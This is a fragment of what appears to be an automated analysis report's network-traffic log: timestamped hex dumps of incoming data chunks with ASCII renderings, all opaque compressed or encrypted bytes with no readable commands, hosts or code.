                                                                                                                                                            2022-09-29 12:45:15 UTC24485INData Raw: df 86 93 44 e7 1f 4f cf bc b3 8d ff 0b ba e8 d0 dc 4e 24 fb 4f bb e2 d7 32 fb 9c 5a 44 4e 45 69 e3 e4 2f f2 d5 4d 82 58 f7 42 3e 93 c6 a7 b7 bd 19 fe f1 cc 98 ba c8 c5 00 7a 0b b4 00 ce ea c2 ed 9c fc df c3 ec 15 5c 0e 2a 2c 6d d5 69 96 4f 16 3a ac 27 3f 64 0b fa 38 a7 30 28 50 bb 3d 7e c8 0d 8f 63 a8 c9 f0 1c 95 ef eb 7b e0 ab 53 37 b8 cc 8b 6e ce 31 05 93 d5 70 87 55 13 f3 62 8d 69 66 c2 0d 04 24 8e 82 f3 d7 30 6e 97 c7 70 ed 3b 8f d9 8a 0b c1 a5 1c 0b 65 ad 8b 55 f9 18 eb 90 47 70 8f b9 7b 04 a9 0f b3 dc 9e b7 c6 a5 e3 d5 0f 8a 7c ff 52 66 56 bf 3f b5 53 79 2f 4e 62 74 ab 9e 57 ec d8 db 42 c7 d0 ca 0e 9a 73 05 57 9a 94 29 5b 79 99 5b 67 60 84 ab 25 14 09 80 7c 5d 67 c9 28 9f 8b f5 90 e1 d4 a7 d8 5e a3 f5 1e ab 29 1c 95 94 bf 54 79 0e a5 92 0d 11 ff 64
                                                                                                                                                            Data Ascii: DON$O2ZDNEi/MXB>z\*,miO:'?d80(P=~c{S7n1pUbif$0np;eUGp{|RfV?Sy/NbtWBsW)[y[g`%|]g(^)Tyd
                                                                                                                                                            2022-09-29 12:45:15 UTC24501INData Raw: 8f 8a 7c 20 34 0c 3a f6 a5 6d 75 14 f2 0b 18 64 d0 95 39 83 67 16 2c e1 65 1a 30 0b 07 b7 85 d0 0b bf fe f1 1d e5 3f 29 fb f1 13 1e 26 9c f9 38 c8 0d c8 60 d8 08 5b 23 4a 73 d1 a2 10 cd ff 19 e0 c8 30 56 32 41 97 a3 38 ce 35 ea 85 32 6e c8 1c 55 bc 1f 98 02 20 20 27 dd ef c4 72 4b 79 ba 1a 2c 9f d3 1a a7 0f 3b 60 6b 74 27 57 e8 13 58 ef de f6 cd 4c 75 4b 07 e4 9e d5 60 af 60 af f9 e8 5f ae 96 ac 28 36 8a 39 11 12 b6 fc 20 48 77 d6 80 48 10 a9 08 d1 19 dc db 2b f8 a7 28 32 0b 29 1c a4 3b 42 ee 9d b0 4c 28 47 c2 6d 55 78 86 e0 bc f7 da c4 51 21 9f aa 7f 24 ff 55 08 b5 17 3f 2c fc 5b 87 4e 70 7f 47 a7 1f 57 61 84 64 8b 76 7a cd 7e 8c d0 41 ee e1 95 31 fc ad d7 c6 35 90 8e ec f4 25 36 70 5e ea 11 d4 11 55 17 e7 be c4 c1 ed 59 b1 6b a2 aa 32 d6 c4 bc 8b 15 77
                                                                                                                                                            Data Ascii: | 4:mud9g,e0?)&8`[#Js0V2A852nU 'rKy,;`kt'WXLuK``_(69 HwH+(2);BL(GmUxQ!$U?,[NpGWadvz~A15%6p^UYk2w
                                                                                                                                                            2022-09-29 12:45:15 UTC24517INData Raw: 44 3f 91 42 9d 78 b3 f2 ab 2c 2f ee e3 50 85 5d 63 93 32 40 f8 6f 1e b9 85 9d 6a 39 28 84 e3 95 f0 ae 0c c2 28 d1 a7 ea 4a 0d 7f d5 97 5f 3e be e3 cf 38 22 12 2f 5c 03 15 15 9f d8 b5 38 58 f6 0f 65 a0 63 42 20 6a 6f 0f 96 72 27 98 93 0d 31 d1 84 96 53 72 d0 28 4f a2 96 d6 18 45 51 8d 94 66 d6 ee b8 ee df 33 31 ae 57 0f a2 02 03 a7 a1 a0 d2 22 e6 b0 f5 e0 03 61 b8 e9 86 1c 6c 92 c1 fe a0 ce fc ac 4d f5 0a e1 7b fc 5b aa 8b 64 6e 7d 70 61 89 07 8d 9d 00 c0 c4 bc 79 bf 5a 0f 76 06 2a 75 21 ee e3 f4 c0 69 a4 47 9c 19 0b a3 bc 81 28 be 1e 31 77 1c 1e 72 db 73 63 a4 4f 57 4b d9 b4 7f 54 a4 02 ba a5 a7 6c 14 c4 52 dc e0 40 0b 3b 61 a3 b8 e1 22 29 1d 67 f7 55 74 1d ac 41 3a c3 fd 72 2e bc f5 d2 87 57 91 8f 32 d1 c1 f0 e9 04 14 a9 32 4b 86 bb 40 e6 80 a8 b9 9c 1f
                                                                                                                                                            Data Ascii: D?Bx,/P]c2@oj9((J_>8"/\8XecB jor'1Sr(OEQf31W"alM{[dn}payZv*u!iG(1wrscOWKTlR@;a")gUtA:r.W22K@
                                                                                                                                                            2022-09-29 12:45:15 UTC24533INData Raw: da 25 f4 67 05 4d 5f 0d a9 6b c5 02 db d0 ed 04 4c e4 a2 7a 33 83 fb b2 21 14 0c 8c 91 9e a1 d5 77 bb 74 25 60 59 c3 ed 49 1e 9f a2 3a 23 27 00 e3 1b 42 d6 1d c3 dc 31 47 48 75 e2 7c d1 cb e9 68 fc c9 21 9e 8b 75 c7 84 1c 09 ea fd 3f d1 ab 33 dc aa a7 02 f3 f1 a0 c8 33 3e 71 ec 32 86 4a 61 66 58 41 d3 6e c7 5f ed 7d b8 ba 55 16 1c ee 18 53 ad af 0a 7b 3c c9 83 a5 da 19 8c b0 b2 7c 8b b6 29 63 40 61 c5 fe 26 f6 5a 81 95 9d 2e d3 5c 32 62 74 39 92 a2 0d 1d 5b 55 62 1c 6a e4 f0 2c 7d 00 8f 49 9c 21 2e 32 8c da ea d6 b4 d1 f4 c0 79 5b 8a 8c 24 09 66 f3 51 2c 1e 21 d6 03 7c 41 af 19 8a 63 df c3 00 70 8f 5b dc 5d fd 0e ff 0f b9 14 4d c4 cb 72 d3 54 a9 01 6d 46 44 93 bc 1b 94 66 38 76 4f 0a c6 57 18 15 cb 66 45 4d ff 0f 9c a7 12 63 6b fd 05 4a 24 1c 14 30 5f 0a
                                                                                                                                                            Data Ascii: %gM_kLz3!wt%`YI:#'B1GHu|h!u?33>q2JafXAn_}US{<|)c@a&Z.\2bt9[Ubj,}I!.2y[$fQ,!|Acp[]MrTmFDf8vOWfEMckJ$0_
                                                                                                                                                            2022-09-29 12:45:15 UTC24549INData Raw: a8 4b 5e 2f 24 f8 64 4c 82 90 43 fd 8e 3c 11 46 c3 d0 cf cb ae cd 9a da 71 c6 ed 33 11 37 8c bd 96 76 37 2d cf 64 83 d5 ca 75 0f 3d ee 57 bc 19 40 0b 7c 28 e7 00 53 34 96 8f 4b 3a ac 47 1d 0e ca 6f bf 32 d1 91 2a 8c ac 18 f9 15 da 7c 01 93 a6 3b 61 2e 34 33 d2 cc 03 17 21 66 f4 52 2b 08 15 83 5f e6 58 eb 5b a5 d6 9a 20 67 f0 1e 06 b1 f8 99 3a 3e ff 0b e6 14 95 14 f6 29 af 49 99 b3 f8 10 29 bf 52 cf 64 15 bf 19 67 9c 80 24 3d c8 c7 ad 66 87 b9 b6 e6 b0 9f 27 3e 06 06 9c be c7 41 9c be cf 4c fb 5e f0 ba 42 3c 8a 52 1b 2d 48 2c a4 fc 84 f7 8a 7d c5 a2 0b 69 5f 1c 89 7f 7e 87 28 e5 a6 fa ea c8 5a 12 b1 8c 0b 6a 69 43 30 74 7e f5 42 6a a1 22 7b 89 3f f6 53 08 d7 7c 46 53 6a 81 f7 23 e3 f4 56 59 6d 2a 4f 56 42 89 c9 e6 1c 5d 3d 70 f9 02 5e 0c ef 7c ff 11 58 3b
                                                                                                                                                            Data Ascii: K^/$dLC<Fq37v7-du=W@|(S4K:Go2*|;a.43!fR+_X[ g:>)I)Rdg$=f'>AL^B<R-H,}i_~(ZjiC0t~Bj"{?S|FSj#VYm*OVB]=p^|X;
                                                                                                                                                            2022-09-29 12:45:15 UTC24565INData Raw: 13 2f 24 3a 29 f1 72 b6 58 80 a2 d3 08 fc 7c 78 33 b8 5e e6 5c d8 98 d1 ad 75 0f 04 b7 c6 dc b5 80 5d cf d8 82 8d d7 c1 bb 59 7a 4a cf f1 a0 b1 ff 8a 28 11 cf f7 93 e6 81 9f db bf 4b a0 96 1c 3f e5 b8 da dc c7 86 33 e8 b1 f0 d0 70 4c 8d aa c4 84 a6 00 ca 87 8e 04 05 c7 7f 64 15 5f c4 bb 97 1e e5 c6 81 72 e5 a4 fd cc 81 11 2a 51 c8 b8 e1 25 89 5b 46 11 ee f3 bf 61 3d 4f 29 f8 7d c3 63 32 74 7c 45 08 a1 76 e5 b9 1b f3 9a da 18 91 ae 4a 08 bf 7c 87 36 ac 47 ab 5c a4 32 bf f1 b0 07 32 d7 51 f9 62 84 e6 52 53 e8 29 7e 51 6c f2 5c 00 3d d5 01 af cd 34 55 e0 f1 5f 75 f6 04 42 5b 54 29 af 1e 85 31 9a 2b 89 46 9b 42 65 48 dc ef 8f a5 72 07 ab 3d 26 b1 77 a0 98 64 44 91 ca 05 ba ed 5e bc fd cc c6 08 40 8e 78 15 5c b8 b6 0c fb 07 3c 4e e9 d8 b4 39 24 57 10 2a 02 c3
                                                                                                                                                            Data Ascii: /$:)rX|x3^\u]YzJ(K?3pLd_r*Q%[Fa=O)}c2t|EvJ|6G\22QbRS)~Ql\=4U_uB[T)1+FBeHr=&wdD^@x\<N9$W*
                                                                                                                                                            2022-09-29 12:45:15 UTC24581INData Raw: e0 65 72 5a ed 82 42 8e 24 97 44 f9 06 c4 10 8f d8 33 91 c4 46 3d 89 51 83 2e 80 62 68 63 ed 21 58 db e2 48 98 bb 53 78 7c ad a3 c9 c2 89 62 cd 63 5b ac 60 e0 0d 67 59 5f 54 5a 47 0f d9 f0 67 e5 3a 1f 1e 03 63 c1 ad ac 80 7a 15 e9 83 ac db 0b 7b 2e 42 d0 60 a9 1c 85 53 7d 74 ec e9 6d 45 53 27 69 76 55 ae c6 65 c9 c1 c6 a3 08 fd ac 00 b1 e6 af 2c bd d6 3c 41 5a d2 ab 66 c4 61 77 5d cd 73 e3 6c 57 26 5b 14 3f 8f 41 e4 92 ca 15 97 19 3a 10 28 24 6c 1f 77 3f bf a8 9e b1 45 22 79 77 bd ee 19 fa e3 39 96 12 d5 6f 01 d3 a3 58 d8 0e 03 6d a4 73 88 2f 84 67 39 86 06 cd 64 4f 45 4e 85 19 13 11 7e 4d 0f bc 7b 23 ad 34 3b 92 63 3e 20 65 be 8b a6 af 06 19 5e 47 69 9c 64 b8 e2 f3 65 d8 3c ad f0 9f a6 21 0f 14 a6 84 e5 3e 2b 76 e1 a7 eb 39 af 8a b0 67 c8 a1 e6 c6 f2 b3
                                                                                                                                                            Data Ascii: erZB$D3F=Q.bhc!XHSx|bc[`gY_TZGg:cz{.B`S}tmES'ivUe,<AZfaw]slW&[?A:($lw?E"yw9oXms/g9dOEN~M{#4;c> e^Gide<!>+v9g
                                                                                                                                                            2022-09-29 12:45:15 UTC24597INData Raw: 90 cd 77 b1 10 dd 85 c4 1c db c3 5a ca 50 f7 e4 5c 8b 45 67 b8 a2 d4 bf 30 3c b4 c6 0a c4 9c ae 92 b1 26 77 34 4e 73 62 98 ec 72 d6 48 b2 12 51 7f 88 dc 6f a0 75 9e ca f3 7d ee 5a 32 89 a9 7c 5e 8f 54 d5 fb 87 0a 54 53 dd 58 36 63 41 d2 25 eb bf 8c 3c 53 89 8e b9 a5 d9 4a 98 43 fe 8b 91 7d 36 17 50 a1 bb 7d 3b 24 f3 53 05 21 67 22 1b 0b 5d 5a 80 33 47 f3 b3 f1 25 2a 98 49 44 17 58 6d d8 23 9b b8 40 f3 29 2d 0e a4 00 94 ba ae a4 a7 43 ac e6 2d 4e c3 87 5a 47 37 3a 34 26 6e f0 af ed a5 dc d7 4f 3b 8c 9b 2e 98 ce ba 20 de ba e7 b5 43 25 1d d9 80 05 70 f5 51 07 5c 29 94 4e 45 85 3f f7 77 72 0a 33 74 f1 f9 bb a0 c2 39 0f b0 38 25 fd 79 c7 2f 3a 08 72 62 5c 91 6a 1f 7b a5 60 03 26 e5 f8 67 9f d3 02 22 f9 85 b8 a0 ed 73 4c f0 3d 79 f3 66 56 3d ad 16 0d 0d a9 eb
                                                                                                                                                            Data Ascii: wZP\Eg0<&w4NsbrHQou}Z2|^TTSX6cA%<SJC}6P};$S!g"]Z3G%*IDXm#@)-C-NZG7:4&nO;. C%pQ\)NE?wr3t98%y/:rb\j{`&g"sL=yfV=
                                                                                                                                                            2022-09-29 12:45:15 UTC24613INData Raw: 8e 52 42 ea 96 31 5f eb 74 06 53 24 e2 c4 d8 b2 00 55 7d c1 4f 80 c1 7e 61 af f5 f0 76 8e 56 40 7f 51 f1 63 c0 2c 0e 7d 7a 26 09 f6 2d 34 f6 b5 44 15 9f f3 fd 91 08 9c 53 78 23 86 27 90 46 97 57 72 52 b9 fd d4 11 61 5e 82 2e 6f fc 0c f5 46 85 5b c6 64 2c ab 03 cc ed 9e 52 e8 f7 71 68 e9 07 02 f8 b6 0c e6 b9 c5 63 18 08 20 b3 ae 4e b5 18 77 70 17 60 ff c2 fd b4 fb e3 f7 cc 31 74 f6 de c8 56 4c d1 73 83 e1 9b b2 d9 bb e4 98 89 18 64 d4 a6 b9 e4 e4 78 88 19 2b 4d 87 27 ea 41 06 70 4b 24 50 4b db df 4a 65 91 46 40 a9 eb 35 53 89 59 d0 83 c1 b3 01 07 2b 30 fa cc 97 ad 06 46 29 cd 41 7a e6 25 74 22 0e c8 65 2b b8 58 e9 92 5d d4 6a 71 bf 8b 11 0e 2c 90 69 8e 3c f6 f0 8c d9 07 2e 99 56 a0 23 a0 46 bd 8b 5e 75 20 4e e1 45 6b 10 db 00 a4 5e 42 34 0a 55 62 72 51 00
                                                                                                                                                            Data Ascii: RB1_tS$U}O~avV@Qc,}z&-4DSx#'FWrRa^.oF[d,Rqhc Nwp`1tVLsdx+M'ApK$PKJeF@5SY+0F)Az%t"e+X]jq,i<.V#F^u NEk^B4UbrQ
                                                                                                                                                            2022-09-29 12:45:15 UTC24629INData Raw: a2 ba 8b 22 d1 89 86 3a fc 31 68 24 43 ed 9b b4 1b 86 ff 29 f5 96 72 ff c0 b6 97 ff 9e ce 94 50 57 78 5b 0c 4d 07 01 d8 25 6e a3 f5 fb 06 6a 40 93 33 37 5b b1 0c 52 8a ba 8d e1 87 db 5a 4c f7 43 13 09 5a 5c 0a a4 9c 50 90 ec f7 53 0a 8c 6b 5a ea 6e 0c 41 95 f8 ed a3 3a 68 06 97 41 23 38 11 61 8f c7 4e a7 37 4c 53 c8 2b 0f 2a 5c 03 db b8 77 f1 fe 08 4d a7 bf 7d 00 f5 e1 12 cd b5 e2 4b cb 7d 15 3f 36 dc 33 b6 ce 1e 92 87 03 1f 6c 0f 5f f4 36 07 15 de 47 86 5d 8d 25 86 6f ed ca 4c d3 d7 3a 0e 4c 79 c3 86 2d 67 f4 9d f6 9d 63 11 be 28 34 fd c1 55 b5 f1 cb 00 35 4e 07 a4 27 41 74 6c 60 f8 b4 70 53 52 19 1a 5f 40 b6 68 03 e6 5b 4b f0 79 63 e9 d4 54 5a a2 b6 11 eb 71 79 7c 0e 93 65 94 09 bd 6b aa 9a e7 a4 0f e9 1f 60 4f 01 65 20 9d 76 b7 5f 65 52 be 1d fa 30 9f
                                                                                                                                                            Data Ascii: ":1h$C)rPWx[M%nj@37[RZLCZ\PSkZnA:hA#8aN7LS+*\wM}K}?63l_6G]%oL:Ly-gc(4U5N'Atl`pSR_@h[KycTZqy|ek`Oe v_eR0
                                                                                                                                                            2022-09-29 12:45:15 UTC24645INData Raw: fc 93 ab 1d f2 f2 5b f2 ab 33 a3 89 9e 64 97 98 54 0f 2b dc a8 02 48 56 f3 7a 04 93 3f fb 42 95 0a 37 25 d2 a0 a6 85 8a 75 72 7c 80 4f 04 4c 6b 14 4e cc 6f 03 9c aa 5b bb 1b b6 e3 4a 50 94 1d e7 1f 2c 2c d1 56 1a 6d 87 11 3e 50 65 5c 38 37 46 0a a5 35 83 7a 2f a2 c1 55 fb 45 6d 11 c0 af b3 17 88 e3 de 64 d9 e3 c4 f9 86 52 a7 6c 13 c7 2c 8d 11 37 6a 5e 16 7e 96 65 8c 5a 0d 48 54 fd 78 57 87 ab 15 72 f6 59 04 bf d2 6f 32 b0 8b a4 6a d2 e3 59 91 73 72 fc 37 c6 98 d5 e1 2a 2e 97 d4 80 33 1f 06 24 0c 53 0c 45 f0 81 15 ff 0a dd 41 90 fd 1d 0a db 86 74 4e c3 6e 85 13 6f 85 78 74 0d 85 04 fe 4c 5a 5e 14 3a b1 78 49 63 af 17 be 1e f8 ff 1a 16 7d 7c 32 50 e1 18 34 df f6 48 10 dc 93 f0 0f 1b 9a f2 cf e4 08 fc b2 3a 9c 05 7a 68 44 6e 07 0e 97 7d 99 dd 3b 61 f4 31 f8
                                                                                                                                                            Data Ascii: [3dT+HVz?B7%ur|OLkNo[JP,,Vm>Pe\87F5z/UEmdRl,7j^~eZHTxWrYo2jYsr7*.3$SEAtNnoxtLZ^:xIc}|2P4H:zhDn};a1
                                                                                                                                                            2022-09-29 12:45:15 UTC24661INData Raw: 21 85 6e 8c d5 31 38 38 62 59 8d 71 ef 2d 34 5c 21 04 b3 16 1b 74 1f 97 d2 e2 1c e4 a4 b4 32 60 07 df 9b 76 37 79 3b 2e b6 28 e5 21 28 6f fd f0 b8 1b c5 80 43 e3 39 28 a8 00 fb 7b 25 66 c0 71 d0 25 b9 3e f1 7e 16 67 c3 a5 fa b4 b6 20 b8 b0 e4 88 49 b4 ad 7e 75 f0 98 31 53 2b 0f ff e0 34 b5 67 44 2e 58 2d 01 d9 36 b9 52 47 86 d8 99 fa 3c 69 e8 44 b6 0d 53 c2 7d 50 c5 80 6c e7 fa dd ce 47 39 90 db 76 07 d7 5f ea 1c 54 05 00 34 91 7f 69 c7 8a 28 8f 2e f8 2d 75 0c 49 2a d3 76 61 5b 96 9c 4c e1 c0 2a 96 9a 9e b6 e9 9b 8e c9 af f2 ea 16 36 8b 1d 9d 70 fa b2 b7 6b 11 d0 24 cc c1 2e 9a 47 9a fa 17 76 a0 41 e8 85 ff a3 27 fd e9 0a 3d f5 fa e1 b3 4a 53 dd 1d f1 b2 47 d4 2d 4b 6b 29 63 57 6b 52 0c 78 01 c0 a7 03 80 53 52 b1 5f 5c 15 e7 8a 46 32 52 35 14 88 1e 8d 9a
                                                                                                                                                            Data Ascii: !n188bYq-4\!t2`v7y;.(!(oC9({%fq%>~g I~u1S+4gD.X-6RG<iDS}PlG9v_T4i(.-uI*va[L*6pk$.GvA'=JSG-Kk)cWkRxSR_\F2R5
                                                                                                                                                            2022-09-29 12:45:15 UTC24677INData Raw: 51 d3 ef 60 ba 09 ad f1 7f 49 3c 0c 4a 87 07 db 21 21 28 55 52 94 41 61 62 3b 71 1b 4a b8 ec a5 34 4e 36 f4 9e 40 3c b0 e2 19 e5 9d 9f e2 4b 01 a6 41 54 bc 7f 5e 80 73 78 29 f7 99 eb 4d 85 f1 84 38 95 b7 1c c8 78 38 34 f8 1e c8 0d b4 db 7a 94 5e 46 1d 4e 68 56 58 71 c5 88 f8 b2 b2 62 9d 4b 88 6d 37 69 4e f1 28 f1 fe e1 f2 fc 0e dd e4 45 fb 7c 30 29 6b 1c 49 f5 fc 2a 48 d3 96 04 7e 0a b2 96 bc bc f6 3d 7e 3f 56 a6 18 57 5e b0 a1 33 42 54 ba 9f 42 b7 85 64 85 5f 54 7c 30 08 2c 96 41 fa 89 5f 58 3a 2e 24 c6 d7 cc 15 02 93 eb 5e c9 78 a4 4f 43 b7 b1 b1 a6 f3 27 e1 db e4 5f b6 06 d0 8c d3 ba 03 2d d1 58 ac 56 05 d0 46 79 f4 cf c5 b3 a0 0e a3 7a da 7b 20 e2 38 e7 d5 9b f4 96 af 99 55 7b 9e fa 87 c8 3e e4 bd fc 44 03 6d 60 28 a3 08 60 cd c8 e6 61 ac 41 4d e2 0c
                                                                                                                                                            Data Ascii: Q`I<J!!(URAab;qJ4N6@<KAT^sx)M8x84z^FNhVXqbKm7iN(E|0)kI*H~=~?VW^3BTBd_T|0,A_X:.$^xOC'_-XVFyz{ 8U{>Dm`(`aAM
                                                                                                                                                            2022-09-29 12:45:15 UTC24693INData Raw: 41 a9 91 8a b2 86 2b 2d 03 2a 92 54 8f 86 46 4d c3 53 90 94 06 36 c7 d9 f0 0e 5f 18 b1 4c ab 61 5c dd f1 c7 c0 47 0b e0 43 30 fc 33 92 51 24 3e a8 f1 7e 77 28 ab 52 67 de 58 a1 52 a4 98 26 e9 b6 dc ef 1f bb 55 fc 7c 94 2f 71 91 c2 a7 35 5c 33 20 c7 60 ea 15 e6 5b 3a 5e bb 57 e0 c8 45 a7 a8 21 84 27 1a f0 d7 81 7c 52 37 15 c3 59 6b 20 a0 70 e9 f6 1f 62 61 87 8e 19 01 09 9b 2b 09 4c 85 b0 ed 64 dd 31 e9 2f 64 48 f2 b1 87 52 ae 09 8a 22 92 39 7e 50 88 e1 64 58 29 6d 98 8a 64 7e 9a 95 a4 94 e6 0e e5 5b 3d fd 58 87 8f c6 9f c8 a7 a9 25 be 03 1d 8e ce 01 5e 94 0e e7 f8 13 e6 45 0e a8 61 3d 29 a8 1c 93 19 6a 13 ba ba 66 d3 b5 4d b9 df aa 37 aa df 6b 25 53 36 f2 99 20 7c 52 07 f3 71 4a 15 b6 d6 ab 6c 21 3a 89 bc 02 cb 03 1a 5c 77 06 49 92 cd 3e 15 1a c6 f9 56 e0
                                                                                                                                                            Data Ascii: A+-*TFMS6_La\GC03Q$>~w(RgXR&U|/q5\3 `[:^WE!'|R7Yk pba+Ld1/dHR"9~PdX)md~[=X%^Ea=)jfM7k%S6 |RqJl!:\wI>V
                                                                                                                                                            2022-09-29 12:45:15 UTC24709INData Raw: 54 a2 fb 2b c4 0d e0 96 1d 6b 31 e4 5c 1c a0 e2 2d a1 02 cd c9 2e 10 0a fc 72 66 00 b4 7f 37 b9 db 08 f8 36 b7 72 a1 1d 8e 47 81 2b e3 6a 53 b9 81 e8 c3 30 e1 1e e5 93 fd 1a ff 60 c4 a1 a8 42 a7 3c 4f 6d 84 b9 46 89 74 6d 51 53 4d d1 a7 d5 63 dd e9 d1 bc 9e 55 36 bf b6 9f ce 5e eb da 6b d5 24 ed 23 42 41 21 70 9f cd 61 ed fd 42 34 07 81 13 8e de 5b 7c 0e 66 95 8c 4f 13 eb 10 35 64 88 e2 48 d0 8a 72 25 d3 e0 47 53 28 9b ff 8f 41 1d 75 25 98 13 4d 03 51 fe 39 dd 26 31 0d 3f a0 2d f3 0e 38 14 b0 89 2e 13 61 cc 04 43 81 b8 19 a5 73 ae 73 dc d2 d7 00 1b b5 94 79 2a a2 bc fc 2e 1c f7 38 96 73 1d 03 bf e0 87 2d 94 ba 6a 7b 05 62 2f 46 a1 db f7 bf a0 14 da 8d b0 32 ef 0d ba 90 c4 40 4a 43 5b 8e c1 74 cc a6 01 18 46 9a 40 91 0b 8e 38 91 ba 50 27 c7 26 fa 2a f0 ce
                                                                                                                                                            Data Ascii: T+k1\-.rf76rG+jS0`B<OmFtmQSMcU6^k$#BA!paB4[|fO5dHr%GS(Au%MQ9&1?-8.aCssy*.8s-j{b/F2@JC[tF@8P'&*
                                                                                                                                                            2022-09-29 12:45:15 UTC24725INData Raw: da ea 03 81 2d 4d d2 e3 92 91 90 18 26 1c 9a 68 05 4a ea a4 35 11 20 86 02 45 e8 9f da 8f 02 c0 8c 8b 1f 9e 70 ce cc c5 c4 35 32 7f 8d 09 a4 13 28 4f 3d 4e 48 e1 a3 77 8d 4f 30 28 36 d0 f0 53 62 ce 4c e4 2d c5 2f 67 1a 1a a2 77 d1 5e 1c 5f 15 e1 97 12 0d f7 fa 7c 58 b3 35 bd c2 00 a8 cf b4 45 50 85 bc fd 7c a1 b1 f0 bc c1 88 6b dd e8 f1 69 e7 0c f3 84 a4 2b 51 e9 cb da 23 b2 08 19 f6 ac d5 64 51 3d ac eb af 55 66 c9 45 7e d8 e5 79 6a 59 b9 76 3d 8f 0f cc ed 6d f8 84 28 01 f6 ae 9a 5e 91 f7 0f 8c b3 c6 7b 28 e2 1e eb 0e f2 2f bb 9b d8 72 17 45 5f 92 ac 04 f0 03 2e 3d 52 22 5d e6 fa 48 09 c7 b0 f8 41 8a d8 3f b5 99 af cd 9b dc 49 39 4b e7 c4 89 8d c8 4e 2b 93 d3 e0 d0 38 fc 2a 06 d0 37 41 28 c3 0e 5d 41 e8 03 dd c9 e7 80 10 27 6e f5 39 0c e2 4b 85 c1 d0 1e
                                                                                                                                                            Data Ascii: -M&hJ5 Ep52(O=NHwO0(6SbL-/gw^_|X5EP|ki+Q#dQ=UfE~yjYv=m(^{(/rE_.=R"]HA?I9KN+8*7A(]A'n9K
                                                                                                                                                            2022-09-29 12:45:15 UTC24741INData Raw: 47 64 38 7b 81 46 57 aa be 0e 73 37 93 5f 72 3e 50 87 b7 a7 bc 36 4b 35 5f f2 ad d1 12 59 fd 3b 0e 09 e1 df d7 66 16 48 e4 73 ce 44 23 b7 36 47 11 ad 37 14 2b 15 85 c5 f3 d6 ea 85 ea fd 95 e7 70 f9 ad c6 fc ff fc 71 d3 be 0c 88 03 70 c9 48 9b 06 5a da a4 90 50 75 40 57 84 7f c7 1c 9f 9a 30 a4 98 9a 7f 82 55 e6 4f 0a 18 48 6c 73 e1 1f 0e af 14 19 17 a2 23 88 ac f7 34 f0 0e dd ef d7 39 94 1b ef 80 cc e9 4c 9d 48 ba f6 93 db 48 50 65 ac 48 ba 18 23 ad 56 ae 1e 7e f9 65 a8 23 d4 94 82 71 ba 40 23 02 72 c4 4c ab 27 03 7b 2b 45 b6 29 31 3f 53 89 c6 10 f1 18 c9 a3 54 60 80 08 5f 81 7d aa c8 78 1e f5 2a 15 bd 40 bd 83 41 71 e5 cd 1e df d0 6b 42 e1 5c 46 1b 00 97 78 3b 2c 25 07 7b c3 33 bf 0d 95 6c 26 80 85 ef 0a 2e db 4f 60 bc e0 f0 4f 08 a3 a3 93 c9 7d 3f 7a 09
                                                                                                                                                            Data Ascii: Gd8{FWs7_r>P6K5_Y;fHsD#6G7+pqpHZPu@W0UOHls#49LHHPeH#V~e#q@#rL'{+E)1?ST`_}x*@AqkB\Fx;,%{3l&.O`O}?z
                                                                                                                                                            2022-09-29 12:45:15 UTC24757INData Raw: 90 27 c1 45 d1 dd 13 06 b7 54 2c d4 69 7e 9f 12 e2 18 28 c8 30 cf 66 84 eb 19 5e cd ff d1 8f fd a6 7e 8b 8e 23 5e 67 c6 d3 13 98 c9 a1 29 25 24 fe 3c 51 15 e0 81 aa 86 9f 60 e7 9c 0c 7a 66 40 89 c0 ff 04 a6 22 ae 13 83 c8 a3 3b 4d 8f b8 32 40 1b 41 7d 66 f7 18 e4 42 15 74 ce c4 5e d6 a9 38 17 5e da c2 40 db 69 b9 68 46 f9 7e 66 3c d9 00 05 b8 f5 d6 40 3d 0d 05 10 2d ac 47 8f 8e e2 d8 44 08 81 a2 4a 86 12 b7 5f ae 32 55 19 af d4 bd 8b 0a 35 f4 cc 9c fa aa c4 83 5c 40 de 1a 6a f5 fc 63 17 56 80 5e 13 82 84 ad f1 2c 03 b3 ab 7c 20 8a 9d eb 91 b8 36 04 f5 d4 6f 41 58 38 7e f9 cc 6d 25 1c ab d1 43 60 05 8e aa b9 aa 86 19 c1 8d bd 8c 95 3a 9b ce cc 32 00 47 6f 50 bc 1e a6 55 e1 05 fd 0e 21 f3 34 fb 5a c4 51 13 e2 24 ba 47 ea f0 74 cf e8 43 55 6b f6 86 1a b1 61
                                                                                                                                                            Data Ascii: 'ET,i~(0f^~#^g)%$<Q`zf@";M2@A}fBt^8^@ihF~f<@=-GDJ_2U5\@jcV^,| 6oAX8~m%C`:2GoPU!4ZQ$GtCUka
                                                                                                                                                            2022-09-29 12:45:15 UTC24773INData Raw: a7 0d 09 df 9b 99 76 78 48 96 f0 19 b9 e7 29 c5 1f d0 a4 3e 11 fe 30 6b e9 31 3e 24 b1 0c 46 67 8f fc 24 ef 7f c3 41 8a 04 87 4f 66 07 98 4d f6 34 09 a9 ca 62 3e ef fc 56 43 bb 99 7a 16 af f0 f1 bc 5d a2 2d 40 45 4f 88 ea 5c 65 eb 0d c6 e8 7c ab 2f 34 e3 ec fd 22 5c 78 10 c0 7d cd f3 c4 a2 75 7f 71 a9 8b f3 68 37 67 6a e9 49 67 ff 7b a4 7e 08 ad a8 98 76 6a 00 5c 5a 97 20 af 64 79 99 1d 82 12 d8 53 18 63 03 16 10 7a c9 e6 23 16 e9 44 aa 70 84 63 8d 38 f1 68 1c 46 f8 42 e2 a2 f0 cd f8 da 20 ca cd 2d 07 58 42 ef b9 6f 6c 0c 31 e3 c4 d3 c7 e2 59 61 7c 8c a2 04 d7 35 f5 31 7a b3 a2 33 8e 2e fc ac fd 37 68 72 a7 da 03 59 9e 85 c1 de f7 42 57 03 3f a8 ca a7 a4 56 87 1a 96 b3 fb 84 3d a6 00 b9 66 ba ca d5 25 8b 4a 9f 86 3c 60 35 93 1f e3 c8 b9 f4 9a 99 4d d9 89
                                                                                                                                                            Data Ascii: vxH)>0k1>$Fg$AOfM4b>VCz]-@EO\e|/4"\x}uqh7gjIg{~vj\Z dyScz#Dpc8hFB -XBol1Ya|51z3.7hrYBW?V=f%J<`5M
